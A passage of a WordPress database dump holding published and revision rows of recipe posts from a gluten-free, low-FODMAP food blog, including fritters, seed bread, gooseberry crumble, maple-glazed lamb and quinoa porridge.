\n\n\n\n

This slice lasts for up to 4 days in the fridge, so no need to shed a tear when your finish your first helping.  It also freezes well for up to one month.  Have a go and let us know what you think.  Next time we will try it with Parmesan - love cheese!

\n\n\n\n

Ingredients

\n\n\n\n

8 eggs

\n\n\n\n

2 handfuls of kale, destemmed and finely chopped

\n\n\n\n

150g mature cheddar, grated

\n\n\n\n

100g feta, crumbled

\n\n\n\n

8 thyme sprigs

\n\n\n\n

500g courgette, grated and drained of most of the moisture

\n\n\n\n

200g gluten free flour

\n\n\n\n

1 tsp garlic infused oil

\n\n\n\n

Salt

\n\n\n\n

Pepper

\n\n\n\n

Method 

\n\n\n\n
  1. Preheat the oven to 100C.
  2. In a bowl, whisk the eggs and then add the chopped kale, cheese, garlic infused oil, courgette and 4 sprigs of thyme.
  3. Then, add the flour and season with salt and pepper.
  4. Pour the ingredients into a lined baking dish and arrange the remaining sprigs and crumbled feta on top.
  5. Place in the oven for about 30 minutes, until cooked through and the top turns golden.
\n\n\n\n
\"\"/
\n','Courgette and Feta Slice','','inherit','closed','closed','','4783-revision-v1','','','2020-04-05 20:52:38','2020-04-05 20:52:38','',4783,'http://tummyrevolution.com/4783-revision-v1/',0,'revision','',0),(4786,1,'2020-04-05 20:54:26','2020-04-05 20:54:26','\n

These are really quick and easy to create and make a great lunch on their own or a super side to just about anything. The key is to have them nice and crisp on the outside and soft on the inside.

\n\n\n\n


We decided to make our fritters with sweet peppers, chives, parsley and parmesan - a great combination. The peppers add a flavoursome kick to the fritters and are full of vitamin C.  They taste best served hot with a dollop of coconut or lactose free yoghurt.

\n\n\n\n

Ingredients

\n\n\n\n

Makes 8

\n\n\n\n


4 medium potatoes (shredded and drained)
4 mini sweet peppers or one normal red pepper
2-3 spring onion (green part only)
2 eggs
1 tsp chopped chives
1 tsp chopped parsley
50g gluten free flour
50g parmesan
1/4 tsp salt
1/4 tsp pepper
125g lactose free yoghurt or coconut yoghurt

\n\n\n\n

Instructions

\n\n\n\n
  1. Preheat the oven to 200 degrees
  2. Peal and coarsely grate the potatoes. Let sit for 10 mins and then strain them through a tea towel or use paper towels. Squeeze out as much water as you can.
  3. Finley chop the mini peppers, chives, parley and spring onion (green bit)
  4. Combine potatoes, mini peppers, chives, parsley, spring onion, eggs in a large bowl
  5. Add in gluten free flour and mix it all together but don\'t over mix it as we want the fritters light ad fluffy
  6. Add in salt, pepper and parmesan cheese
  7. Grease a baking tray well or alternatively use oiled baking paper
  8. Use two tablespoons to form the fritters. Keep them thin as that will make them nice and crispy
  9. Place in the oven and cook or 10-15 mins before flipping them over. Bake for another 10-15 mins until golden brown.
\n\n\n\n

Serve with a dollop of plain coconut or lactose free yogurt.

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Potato Fritters','','publish','open','open','','potato-fritters','','','2020-04-06 23:31:22','2020-04-06 23:31:22','',0,'http://tummyrevolution.com/?p=4786',0,'post','',0),(4787,1,'2020-04-05 20:53:41','2020-04-05 20:53:41','\n

So here is why Tummy Revolution all started...

\n\n\n\n
\"\"/
\n\n\n\n
\nhttp://www.med.monash.edu/cecs/gastro/fodmap/\n
\n','What is the low FODMAP diet?','','inherit','closed','closed','','4784-revision-v1','','','2020-04-05 20:53:41','2020-04-05 20:53:41','',4784,'http://tummyrevolution.com/4784-revision-v1/',0,'revision','',0),(4788,1,'2020-04-05 20:54:39','2020-04-05 20:54:39','\n

Nutty Banana Oatcakes

\n\n\n\n

Oat cakes are packed full of fibre. Fibre fills you up, allows energy to be released slowly and helps maintain a healthy digestion – sounds good to me! My favourite nut butter is \'Whole Earth’s\' peanut butter with pumpkin, sunflower and flax seeds. They couldn’t pack more nutritional goodness in there if they tried! And the banana topping – just full of powerful antioxidants.

\n\n\n\n

Ingredients (serves 2):

\n\n\n\n

2 tablespoons of nut butter of choice

\n\n\n\n

6 gluten free oat cakes

\n\n\n\n

1 banana

\n\n\n\n

Hoping the method is self-explanatory from the pic….

\n','Nutty Banana Oatcakes','','publish','open','open','','nutty-banana-oatcakes','','','2020-04-06 23:31:04','2020-04-06 23:31:04','',0,'http://tummyrevolution.com/?p=4788',0,'post','',0),(4789,1,'2020-04-05 20:54:26','2020-04-05 20:54:26','\n

These are really quick and easy to create and make a great lunch on their own or a super side to just about anything. The key is to have them nice and crisp on the outside and soft on the inside.

\n\n\n\n


We decided to make our fritters with sweet peppers, chives, parsley and parmesan - a great combination. The peppers add a flavoursome kick to the fritters and are full of vitamin C.  They taste best served hot with a dollop of coconut or lactose free yoghurt.

\n\n\n\n

Ingredients

\n\n\n\n

Makes 8

\n\n\n\n


4 medium potatoes (shredded and drained)
4 mini sweet peppers or one normal red pepper
2-3 spring onion (green part only)
2 eggs
1 tsp chopped chives
1 tsp chopped parsley
50g gluten free flour
50g parmesan
1/4 tsp salt
1/4 tsp pepper
125g lactose free yoghurt or coconut yoghurt

\n\n\n\n

Instructions

\n\n\n\n
  1. Preheat the oven to 200 degrees
  2. Peal and coarsely grate the potatoes. Let sit for 10 mins and then strain them through a tea towel or use paper towels. Squeeze out as much water as you can.
  3. Finley chop the mini peppers, chives, parley and spring onion (green bit)
  4. Combine potatoes, mini peppers, chives, parsley, spring onion, eggs in a large bowl
  5. Add in gluten free flour and mix it all together but don\'t over mix it as we want the fritters light ad fluffy
  6. Add in salt, pepper and parmesan cheese
  7. Grease a baking tray well or alternatively use oiled baking paper
  8. Use two tablespoons to form the fritters. Keep them thin as that will make them nice and crispy
  9. Place in the oven and cook or 10-15 mins before flipping them over. Bake for another 10-15 mins until golden brown.
\n\n\n\n

Serve with a dollop of plain coconut or lactose free yogurt.

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Potato Fritters','','inherit','closed','closed','','4786-revision-v1','','','2020-04-05 20:54:26','2020-04-05 20:54:26','',4786,'http://tummyrevolution.com/4786-revision-v1/',0,'revision','',0),(4790,1,'2020-04-05 20:54:39','2020-04-05 20:54:39','\n

Nutty Banana Oatcakes

\n\n\n\n

Oat cakes are packed full of fibre. Fibre fills you up, allows energy to be released slowly and helps maintain a healthy digestion – sounds good to me! My favourite nut butter is \'Whole Earth’s\' peanut butter with pumpkin, sunflower and flax seeds. They couldn’t pack more nutritional goodness in there if they tried! And the banana topping – just full of powerful antioxidants.

\n\n\n\n

Ingredients (serves 2):

\n\n\n\n

2 tablespoons of nut butter of choice

\n\n\n\n

6 gluten free oat cakes

\n\n\n\n

1 banana

\n\n\n\n

Hoping the method is self-explanatory from the pic….

\n','Nutty Banana Oatcakes','','inherit','closed','closed','','4788-revision-v1','','','2020-04-05 20:54:39','2020-04-05 20:54:39','',4788,'http://tummyrevolution.com/4788-revision-v1/',0,'revision','',0),(4791,1,'2020-04-05 20:55:04','2020-04-05 20:55:04','\n

\n\nThis healthy, green rice is deceptively tasty and a great meal on it\'s owner or a versatile companion to other dishes, such as fish or lamb. The spinach, dill and lemon gives the rice such a fresh and new flavour. Add some pine nuts and you\'ll have brought some plain rice into a flavoursome dish that will leave you coming back for more.

\n\n\n\n

Ingredients

50ml extra virgin olive oil
300g basmati and wild rice
300g spinach, finely chopped
4-5 spring onions (green bit only), finely chopped
A bunch of dill, finely chopped
1 lemon
(600ml water to boil the rice in)

Method

\n\n\n\n
  1. Wash the rice until water runs clear. Drain the water.
  2. Heat up the oil in a large saucepan, then add the spring onions (green bit) and cook gently for a 1-2 minutes
  3. Stir in the rice and add 600ml water. Bring to boil, then reduce heat and simmer until the rice is almost cooked (about 15 minutes or until all the water is almost absorbed)
  4. Add the dill and the spinach. Combine and mix thoroughly.
  5. Continue cooking for a few more minutes until the rice is completely cooked and the water is absorbed
  6. Squeeze over the juice of a lemon and season with salt and pepper to taste. Serve warm.
\n\n\n\n
\"\"/
\n','Gorgeous Green Rice','','publish','open','open','','gorgeous-green-rice','','','2020-04-06 23:30:42','2020-04-06 23:30:42','',0,'http://tummyrevolution.com/?p=4791',0,'post','',0),(4792,1,'2020-04-05 20:55:20','2020-04-05 20:55:20','\n

Home made bread is just the best and this tasty, easy-to-make loaf is a must try! We can\'t decide if we prefer this or our pitas....

Turns out this bread is also really popular with friends and family members who wouldn\'t normally eat gluten free bread. A winner all around! 

The recipe contains ingredients such as buckwheat and phylum husk which can be found in health stores and online.  You can substitute the buckwheat for a gluten free flour mix but buckwheat is much higher in fibre and protein, so a better option.
There is no substitute for the phylum husk and you will need it as it gives the dough that spongy texture (we once tried without - needless to say it wasn\'t great coking day for us).  Psyllium husk is also extremely high in fibre.

Ingredients

\n\n\n\n

7g dry yeast
500 ml almond milk or lactose free milk
3 tbsp maple syrup
2 tbsp olive oil
60g (100ml) corn flour
1 tsp salt
300g (500ml) buckwheat
3 tbsp psyllium husk
2 tbsp sunflower seeds
2 tbsp pumpkin seeds

\n\n\n\n

Instructions

\n\n\n\n
  1. Heat up the milk to a luke warm temperature
  2. Place the yeast in a large bowl. Poor over the warm milk and let the yeast dissolve
  3. Add the syrup, oil, cornflour, sunflower, pumpkin seeds, salt and buckwheat
  4. Add the psyllium husk and mix using an electric mixer (using the dough hook) for about 7-10 mins
  5. Cover the baking bowl with cling film and leave the dough to raise for about 1½ hours
  6. Put the dough on a lightly floured table. Shape the dough into a loaf and transfer into a bread tin - lined with baking paper. Brush the bread with water and sprinkle over pumpkin and sunflower seeds. Cover with cling film and leave to raise for 30 minutes
  7. Set the oven to 200° degrees
  8. Bake the loaf in the middle of the oven for 10 min. Then turn the heat down to 175° degree. Then, bake for a further 40 - 45 minute
\n\n\n\n

Let the bread cool before slicing.

\n\n\n\n
\"\"/
\n','Gluten Free Seed Loaf','','publish','open','open','','gluten-free-seed-loaf','','','2020-04-06 23:30:28','2020-04-06 23:30:28','',0,'http://tummyrevolution.com/?p=4792',0,'post','',0),(4793,1,'2020-04-05 20:55:04','2020-04-05 20:55:04','\n

\n\nThis healthy, green rice is deceptively tasty and a great meal on it\'s owner or a versatile companion to other dishes, such as fish or lamb. The spinach, dill and lemon gives the rice such a fresh and new flavour. Add some pine nuts and you\'ll have brought some plain rice into a flavoursome dish that will leave you coming back for more.

\n\n\n\n

Ingredients

50ml extra virgin olive oil
300g basmati and wild rice
300g spinach, finely chopped
4-5 spring onions (green bit only), finely chopped
A bunch of dill, finely chopped
1 lemon
(600ml water to boil the rice in)

Method

\n\n\n\n
  1. Wash the rice until water runs clear. Drain the water.
  2. Heat up the oil in a large saucepan, then add the spring onions (green bit) and cook gently for a 1-2 minutes
  3. Stir in the rice and add 600ml water. Bring to boil, then reduce heat and simmer until the rice is almost cooked (about 15 minutes or until all the water is almost absorbed)
  4. Add the dill and the spinach. Combine and mix thoroughly.
  5. Continue cooking for a few more minutes until the rice is completely cooked and the water is absorbed
  6. Squeeze over the juice of a lemon and season with salt and pepper to taste. Serve warm.
\n\n\n\n
\"\"/
\n','Gorgeous Green Rice','','inherit','closed','closed','','4791-revision-v1','','','2020-04-05 20:55:04','2020-04-05 20:55:04','',4791,'http://tummyrevolution.com/4791-revision-v1/',0,'revision','',0),(4794,1,'2020-04-05 20:55:20','2020-04-05 20:55:20','\n

Home made bread is just the best and this tasty, easy-to-make loaf is a must try! We can\'t decide if we prefer this or our pitas....

Turns out this bread is also really popular with friends and family members who wouldn\'t normally eat gluten free bread. A winner all around! 

The recipe contains ingredients such as buckwheat and phylum husk which can be found in health stores and online.  You can substitute the buckwheat for a gluten free flour mix but buckwheat is much higher in fibre and protein, so a better option.
There is no substitute for the phylum husk and you will need it as it gives the dough that spongy texture (we once tried without - needless to say it wasn\'t great coking day for us).  Psyllium husk is also extremely high in fibre.

Ingredients

\n\n\n\n

7g dry yeast
500 ml almond milk or lactose free milk
3 tbsp maple syrup
2 tbsp olive oil
60g (100ml) corn flour
1 tsp salt
300g (500ml) buckwheat
3 tbsp psyllium husk
2 tbsp sunflower seeds
2 tbsp pumpkin seeds

\n\n\n\n

Instructions

\n\n\n\n
  1. Heat up the milk to a luke warm temperature
  2. Place the yeast in a large bowl. Poor over the warm milk and let the yeast dissolve
  3. Add the syrup, oil, cornflour, sunflower, pumpkin seeds, salt and buckwheat
  4. Add the psyllium husk and mix using an electric mixer (using the dough hook) for about 7-10 mins
  5. Cover the baking bowl with cling film and leave the dough to raise for about 1½ hours
  6. Put the dough on a lightly floured table. Shape the dough into a loaf and transfer into a bread tin - lined with baking paper. Brush the bread with water and sprinkle over pumpkin and sunflower seeds. Cover with cling film and leave to raise for 30 minutes
  7. Set the oven to 200° degrees
  8. Bake the loaf in the middle of the oven for 10 min. Then turn the heat down to 175° degree. Then, bake for a further 40 - 45 minute
\n\n\n\n

Let the bread cool before slicing.

\n\n\n\n
\"\"/
\n','Gluten Free Seed Loaf','','inherit','closed','closed','','4792-revision-v1','','','2020-04-05 20:55:20','2020-04-05 20:55:20','',4792,'http://tummyrevolution.com/4792-revision-v1/',0,'revision','',0),(4795,1,'2020-04-05 20:55:43','2020-04-05 20:55:43','\n

What a great year it\'s been for gooseberries, this year! We\'ve inherited an old gooseberry bush that\'s blooming; it is full of ripe juicy berries. They took a while to pick but the question is…what do we make with all these berries?

\n\n\n\n

We\'re not exactly experts in the gooseberry field, so we had to do some research and have a little think and eventually decided on a gooseberry crumble. We\'ve been wanting to make a good gluten free crumble for some time, so this gave us a good opportunity to try it out.

The crumble itself has been influenced by Sarah Raven; who is known for her gardening skills but she\'s also a great healthy eating cook and has developed some really fantastic recipes. We\'re big fans and have adapted her light cheesecake into a gooseberry crumble. It might sound strange but Sarah\'s cheesecake had a crumble topping that was gluten free and worked perfectly with the gooseberries. We were a little surprised by how great this crumble is and a small slice turned into a second bigger slice...

We served ours with a dollop of some lactose free whipped cream...

Ingredients

500g gooseberries
3 tablespoons brown sugar

For the crumble (from Sarah Raven)

\n\n\n\n

60g ground almonds
60g roughly chopped hazelnuts
20g gluten free oats or quinoa flakes
Pinch of ground cinnamon
40g brown sugar (or coconut sugar)
40g cold unsalted butter, cut into chunks

Method

1. Preheat the oven to 180C
2. Toss the gooseberries with the brown sugar and spread in the bottom of a medium, ovenproof baking tray with 2 tbsp water
3. For the crumble, put the crumble ingredients in a bowl and with your fingers, rub in the butter
4. Scatter the crumble topping evenly over the gooseberries. Bake in the oven for 40-45 mins, until the gooseberries are starting to bubble. 

\n\n\n\n
\"\"/
\n\n\n\n

We\'re sure you\'ll enjoy this one!

\n','Gooseberry Crumble','','publish','open','open','','gooseberry-crumble','','','2020-04-06 23:29:44','2020-04-06 23:29:44','',0,'http://tummyrevolution.com/?p=4795',0,'post','',0),(4796,1,'2020-04-05 20:55:56','2020-04-05 20:55:56','\n

So...it has been a while since we have written on here! I think it\'s about time we shared with you another recipe. TR Pesto Pasta - delicious!

\n\n\n\n

Ingredients (2 servings)

\n\n\n\n

200g gluten free pasta 

\n\n\n\n

40g kale

\n\n\n\n

40ml garlic infused olive oil

\n\n\n\n

40g grated Parmesan

\n\n\n\n

40g pine nuts

\n\n\n\n

Method

\n\n\n\n
  1. Bring a pan of hot water to the boil and cook your pasta
  2. Meanwhile, pan-fry the pine nuts on a medium heat for a few minutes (keep a handful to the side for a topping)
  3. Place the pine nuts, kale and oil into a food processor and blend into a smooth paste
  4. When your pesto is perfect, stir it into your drained, cooked pasta
  5. Sprinkle Parmesan on top with your left over pine nuts
  6. Enjoy! :) <3
\n','Perfect Pesto Pasta','','publish','open','open','','perfect-pesto-pasta','','','2020-04-06 23:37:56','2020-04-06 23:37:56','',0,'http://tummyrevolution.com/?p=4796',0,'post','',0),(4797,1,'2020-04-05 20:55:43','2020-04-05 20:55:43','\n

What a great year it\'s been for gooseberries, this year! We\'ve inherited an old gooseberry bush that\'s blooming; it is full of ripe juicy berries. They took a while to pick but the question is…what do we make with all these berries?

\n\n\n\n

We\'re not exactly experts in the gooseberry field, so we had to do some research and have a little think and eventually decided on a gooseberry crumble. We\'ve been wanting to make a good gluten free crumble for some time, so this gave us a good opportunity to try it out.

The crumble itself has been influenced by Sarah Raven; who is known for her gardening skills but she\'s also a great healthy eating cook and has developed some really fantastic recipes. We\'re big fans and have adapted her light cheesecake into a gooseberry crumble. It might sound strange but Sarah\'s cheesecake had a crumble topping that was gluten free and worked perfectly with the gooseberries. We were a little surprised by how great this crumble is and a small slice turned into a second bigger slice...

We served ours with a dollop of some lactose free whipped cream...

Ingredients

500g gooseberries
3 tablespoons brown sugar

For the crumble (from Sarah Raven)

\n\n\n\n

60g ground almonds
60g roughly chopped hazelnuts
20g gluten free oats or quinoa flakes
Pinch of ground cinnamon
40g brown sugar (or coconut sugar)
40g cold unsalted butter, cut into chunks

Method

1. Preheat the oven to 180C
2. Toss the gooseberries with the brown sugar and spread in the bottom of a medium, ovenproof baking tray with 2 tbsp water
3. For the crumble, put the crumble ingredients in a bowl and with your fingers, rub in the butter
4. Scatter the crumble topping evenly over the gooseberries. Bake in the oven for 40-45 mins, until the gooseberries are starting to bubble. 

\n\n\n\n
\"\"/
\n\n\n\n

We\'re sure you\'ll enjoy this one!

\n','Gooseberry Crumble','','inherit','closed','closed','','4795-revision-v1','','','2020-04-05 20:55:43','2020-04-05 20:55:43','',4795,'http://tummyrevolution.com/4795-revision-v1/',0,'revision','',0),(4798,1,'2020-04-05 20:55:56','2020-04-05 20:55:56','\n

So...it has been a while since we have written on here! I think it\'s about time we shared with you another recipe. TR Pesto Pasta - delicious!

\n\n\n\n

Ingredients (2 servings)

\n\n\n\n

200g gluten free pasta 

\n\n\n\n

40g kale

\n\n\n\n

40ml garlic infused olive oil

\n\n\n\n

40g grated Parmesan

\n\n\n\n

40g pine nuts

\n\n\n\n

Method

\n\n\n\n
  1. Bring a pan of hot water to the boil and cook your pasta
  2. Meanwhile, pan-fry the pine nuts on a medium heat for a few minutes (keep a handful to the side for a topping)
  3. Place the pine nuts, kale and oil into a food processor and blend into a smooth paste
  4. When your pesto is perfect, stir it into your drained, cooked pasta
  5. Sprinkle Parmesan on top with your left over pine nuts
  6. Enjoy! :) <3
\n','Perfect Pesto Pasta','','inherit','closed','closed','','4796-revision-v1','','','2020-04-05 20:55:56','2020-04-05 20:55:56','',4796,'http://tummyrevolution.com/4796-revision-v1/',0,'revision','',0),(4799,1,'2020-04-05 20:56:17','2020-04-05 20:56:17','\n

What a better way to start a morning, so near to Christmas, than with this festive porridge!

\n\n\n\n

At Tummy Revolution, we make our porridge with gluten free oats (40g) and almond milk (300ml). Today we have added: banana, star fruit, peanut butter, dark chocolate and a handful of crumbled pecans.  You can never have enough toppings...

\n\n\n\n
\n

\n
\n','FESTIVE PORRIDGE','','private','open','open','','festive-porridge','','','2020-04-27 10:50:39','2020-04-27 10:50:39','',0,'http://tummyrevolution.com/?p=4799',0,'post','',0); INSERT INTO `wpvt_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (4800,1,'2020-04-05 20:56:32','2020-04-05 20:56:32','\n

If you want to make a Sunday roast with a real WOW this is the one!

\n\n\n\n


We just love a Sunday roast but in the past it\'s left us feeling rather stuffed bloated and in great need of a nap of the sofa.

\n\n\n\n

Well, let us help you there... because this Sunday roast is different. It is full of flavour, texture and crunch but unlike a traditional Sunday roast this one is fresh, light and leaves you feeling wonderfully satisfied. 

\n\n\n\n

It\'s an easy roast to make but you will have to set aside a bit of time for it as there\'s quite a bit of chopping, cooking, char-grilling, mixing etc. (Most good roasts take a bit of time but are well worth the effort!)

Ingredients

\n\n\n\n

1.4 kg shoulder or leg of lamb
1 cup maple syrup
2 tbsp gluten free soy sauce (tamari)
1 tbsp Dijon mustard
1 lemon
3 finely chopped rosemary sprigs
Sea salt and freshly ground black pepper (to season)

Method

1. Preheat the oven to 150 degrees
2. Grate the lemon and place the zest in a large jug, then squeeze the lemon and add the juice to the jug too
3. Add the maple syrup, soy sauce (tamari), mustard and freshly chopped rosemary
4. Place the lamb on a baking tray
5. Pierce the lamb with a sharp knife, so that the glaze can penetrate into the lamb 
6. Pour over the mixture over the lamb and season with salt and pepper.                    
7. Roast for 1 hour
8. Baste the the lamb with the glaze mixture and then cover tightly with tin foil       
9. Bake for a further 3.5/4 hours and baste once or twice during this time.             
10. Remove from oven and cover with foil tin foil (leave to rest for about 20 minutes or until ready to serve)
11. Finally, transfer to a serving platter and carve up some lovely thick slices.

\n\n\n\n

We like to serve our lamb with new potatoes and hazelnuts and a fresh courgette and green bean salad. Delicious!!!

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Slow Roasted Lamb in Sticky Maple Glaze','','publish','open','open','','slow-roasted-lamb-in-sticky-maple-glaze','','','2020-04-06 23:37:44','2020-04-06 23:37:44','',0,'http://tummyrevolution.com/?p=4800',0,'post','',0),(4801,1,'2020-04-05 20:56:17','2020-04-05 20:56:17','\n

What a better way to start a morning, so near to Christmas, than with this festive porridge!

\n\n\n\n

At Tummy Revolution, we make our porridge with gluten free oats (40g) and almond milk (300ml). Today we have added: banana, star fruit, peanut butter, dark chocolate and a handful of crumbled pecans.  You can never have enough toppings...

\n\n\n\n
\"\"/
\n','FESTIVE PORRIDGE','','inherit','closed','closed','','4799-revision-v1','','','2020-04-05 20:56:17','2020-04-05 20:56:17','',4799,'http://tummyrevolution.com/4799-revision-v1/',0,'revision','',0),(4802,1,'2020-04-05 20:56:32','2020-04-05 20:56:32','\n

If you want to make a Sunday roast with a real WOW this is the one!

\n\n\n\n


We just love a Sunday roast but in the past it\'s left us feeling rather stuffed bloated and in great need of a nap of the sofa.

\n\n\n\n

Well, let us help you there... because this Sunday roast is different. It is full of flavour, texture and crunch but unlike a traditional Sunday roast this one is fresh, light and leaves you feeling wonderfully satisfied. 

\n\n\n\n

It\'s an easy roast to make but you will have to set aside a bit of time for it as there\'s quite a bit of chopping, cooking, char-grilling, mixing etc. (Most good roasts take a bit of time but are well worth the effort!)

Ingredients

\n\n\n\n

1.4 kg shoulder or leg of lamb
1 cup maple syrup
2 tbsp gluten free soy sauce (tamari)
1 tbsp Dijon mustard
1 lemon
3 finely chopped rosemary sprigs
Sea salt and freshly ground black pepper (to season)

Method

1. Preheat the oven to 150 degrees
2. Grate the lemon and place the zest in a large jug, then squeeze the lemon and add the juice to the jug too
3. Add the maple syrup, soy sauce (tamari), mustard and freshly chopped rosemary
4. Place the lamb on a baking tray
5. Pierce the lamb with a sharp knife, so that the glaze can penetrate into the lamb 
6. Pour over the mixture over the lamb and season with salt and pepper.                    
7. Roast for 1 hour
8. Baste the the lamb with the glaze mixture and then cover tightly with tin foil       
9. Bake for a further 3.5/4 hours and baste once or twice during this time.             
10. Remove from oven and cover with foil tin foil (leave to rest for about 20 minutes or until ready to serve)
11. Finally, transfer to a serving platter and carve up some lovely thick slices.

\n\n\n\n

We like to serve our lamb with new potatoes and hazelnuts and a fresh courgette and green bean salad. Delicious!!!

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Slow Roasted Lamb in Sticky Maple Glaze','','inherit','closed','closed','','4800-revision-v1','','','2020-04-05 20:56:32','2020-04-05 20:56:32','',4800,'http://tummyrevolution.com/4800-revision-v1/',0,'revision','',0),(4803,1,'2020-04-05 20:58:08','2020-04-05 20:58:08','\n

\n\n200g quinoa
1 orange, peeled and sliced
A handful of walnuts
A handful of dried cranberries
Few sprigs of parsley
3 spring onions (green part only)
100g feta cheese
Lettuce leaves

\n\n\n\n

Dressing
Olive oil
red wine vinegar
dijon mustard
maple syrup

\n\n\n\n

Method

\n','Quinoa salad with orange, feta & cranberries','','publish','open','open','','quinoa-salad-with-orange-feta-cranberries','','','2020-04-05 20:58:10','2020-04-05 20:58:10','',0,'http://tummyrevolution.com/?p=4803',0,'post','',0),(4804,1,'2020-04-05 20:58:29','2020-04-05 20:58:29','\n

\n\nThis quinoa porridge with chia seeds is a great oat porridge alternative and the strawberry and rhubarb compote is just devine!. We love this breakfast and often have it 2 or 3 times a week.

\n\n\n\n

Quinoa and chia seeds are both super-foods, they have large nutritional profiles, are full of antioxidants and can even help balance your blood sugar. So having both together means the health benefits of this dish are off the scale

\n\n\n\n

With rhubarb coming into season it\'s ideal to use this great vegetable (yep, it\'s a vegetable). Rhubarb is packed with minerals, vitamins and other nutrients that make it ideal for keeping our bodies healthy. Local Strawberries this time of year juicy and delicious and are also another super-food so that brings the super-food count up to 3 in this dish.

\n\n\n\n

Get making this now to fill your tummy full of goodness

\n\n\n\n

\n\n\n\n

Ingredients

\n\n\n\n

Strawberry and Rhubarb compote
Serves 2 (keeps in the fridge for up to a week)

\n\n\n\n

1 cup (250g) strawberries , cut is smaller pieces if large
1/2 cup (125g) rhubarb, cut in small peices
2 tbsp maple syrup
2 tbsp water
half a lemon (small squeeze)
Quinoa flakes & chia seed porridge
serves 1 person

\n\n\n\n

1/3 cup (30 g) quinoa flakes
3 tbsp chia seeds
2/3 cup (160 mls) water
1/3 cup (80 mls) almond milk or lactose free milk
a tiny pinch of salt (optional)Start by making the compote as you can make the porridge whilst the compote is cooling.
Method (compote)

\n\n\n\n

In a medium pan stir the water, maple syrup and squeeze in a little bit of lemon juice from half a lemon. Bring to boil and then simmer for a couple of minutes over low heat.
Add the rhubarb and simmer on low heat for about 5 minutes or until soft. Stir occasionally
Add the strawberries and simmer on low heat for a further 3-5 minutes or until soft.
Set aside to cool
Taste and add the vanilla essence if desired
Method (porridge)

\n\n\n\n

Combine the quinoa flakes, chia seeds, water and milk and a tiny pinch of sea salt together in a small saucepan, gently bring to a simmer
Cook for 5-10 minutes until the quinoa flakes are tender
Serve in bowls with the compote and if you like some cold almond/lactos free milk. Now, that\'s a yummy tummy friends breakfast.\n\n

\n','Quinoa flake and chia seed porridge with strawberry and rhubarb compote','','publish','open','open','','quinoa-flake-and-chia-seed-porridge-with-strawberry-and-rhubarb-compote','','','2020-04-05 20:58:30','2020-04-05 20:58:30','',0,'http://tummyrevolution.com/?p=4804',0,'post','',0),(4805,1,'2020-04-05 20:58:08','2020-04-05 20:58:08','\n

\n\n200g quinoa
1 orange, peeled and sliced
A handful of walnuts
A handful of dried cranberries
Few sprigs of parsley
3 spring onions (green part only)
100g feta cheese
Lettuce leaves

\n\n\n\n

Dressing
Olive oil
red wine vinegar
dijon mustard
maple syrup

\n\n\n\n

Method

\n','Quinoa salad with orange, feta & cranberries','','inherit','closed','closed','','4803-revision-v1','','','2020-04-05 20:58:08','2020-04-05 20:58:08','',4803,'http://tummyrevolution.com/4803-revision-v1/',0,'revision','',0),(4806,1,'2020-04-05 20:58:29','2020-04-05 20:58:29','\n

\n\nThis quinoa porridge with chia seeds is a great oat porridge alternative and the strawberry and rhubarb compote is just devine!. We love this breakfast and often have it 2 or 3 times a week.

\n\n\n\n

Quinoa and chia seeds are both super-foods, they have large nutritional profiles, are full of antioxidants and can even help balance your blood sugar. So having both together means the health benefits of this dish are off the scale

\n\n\n\n

With rhubarb coming into season it\'s ideal to use this great vegetable (yep, it\'s a vegetable). Rhubarb is packed with minerals, vitamins and other nutrients that make it ideal for keeping our bodies healthy. Local Strawberries this time of year juicy and delicious and are also another super-food so that brings the super-food count up to 3 in this dish.

\n\n\n\n

Get making this now to fill your tummy full of goodness

\n\n\n\n

\n\n\n\n

Ingredients

\n\n\n\n

Strawberry and Rhubarb compote
Serves 2 (keeps in the fridge for up to a week)

\n\n\n\n

1 cup (250g) strawberries , cut is smaller pieces if large
1/2 cup (125g) rhubarb, cut in small peices
2 tbsp maple syrup
2 tbsp water
half a lemon (small squeeze)
Quinoa flakes & chia seed porridge
serves 1 person

\n\n\n\n

1/3 cup (30 g) quinoa flakes
3 tbsp chia seeds
2/3 cup (160 mls) water
1/3 cup (80 mls) almond milk or lactose free milk
a tiny pinch of salt (optional)Start by making the compote as you can make the porridge whilst the compote is cooling.
Method (compote)

\n\n\n\n

In a medium pan stir the water, maple syrup and squeeze in a little bit of lemon juice from half a lemon. Bring to boil and then simmer for a couple of minutes over low heat.
Add the rhubarb and simmer on low heat for about 5 minutes or until soft. Stir occasionally
Add the strawberries and simmer on low heat for a further 3-5 minutes or until soft.
Set aside to cool
Taste and add the vanilla essence if desired
Method (porridge)

\n\n\n\n

Combine the quinoa flakes, chia seeds, water and milk and a tiny pinch of sea salt together in a small saucepan, gently bring to a simmer
Cook for 5-10 minutes until the quinoa flakes are tender
Serve in bowls with the compote and if you like some cold almond/lactos free milk. Now, that\'s a yummy tummy friends breakfast.\n\n

\n','Quinoa flake and chia seed porridge with strawberry and rhubarb compote','','inherit','closed','closed','','4804-revision-v1','','','2020-04-05 20:58:29','2020-04-05 20:58:29','',4804,'http://tummyrevolution.com/4804-revision-v1/',0,'revision','',0),(4807,1,'2020-04-05 20:59:07','2020-04-05 20:59:07','\n

\n\nOur ideal way of cooking is making food that takes minimum effort, tastes fantastic and is full of nutrition. This is one of those dishes and as an extra bonus it also looks amazing!

\n\n\n\n

This dish is simple, its a throw it all in and let the oven do the work dish and is wonderful and delicious. Oven baked cherry tomatoes really do work wonderfully with fish they have that rich oily taste which pairs great with white fish and the lemon adds a little zest

\n\n\n\n

Served with the green rice we made earlier in the week and you have a superb dinner!

\n\n\n\n

Serves 4

\n\n\n\n

Ingredients

\n\n\n\n

400 grams (2-4pcs) fish fillets like cod, haddock, salmon or monk fish
4 vines of cherry tomatoes
50 g green beans
30 grams black pitted olives
100 grams broccoli florets cut in half or quarters if large
1 lemon, half cut in slices
salt and peper
2 tbsp olive oil
Method

\n\n\n\n

Preheat the oven to 200 °
Place the fish fillets on baking tray
Place all the vegetables and the lemon slices around the fish fillets and sprinkle over the the olives.
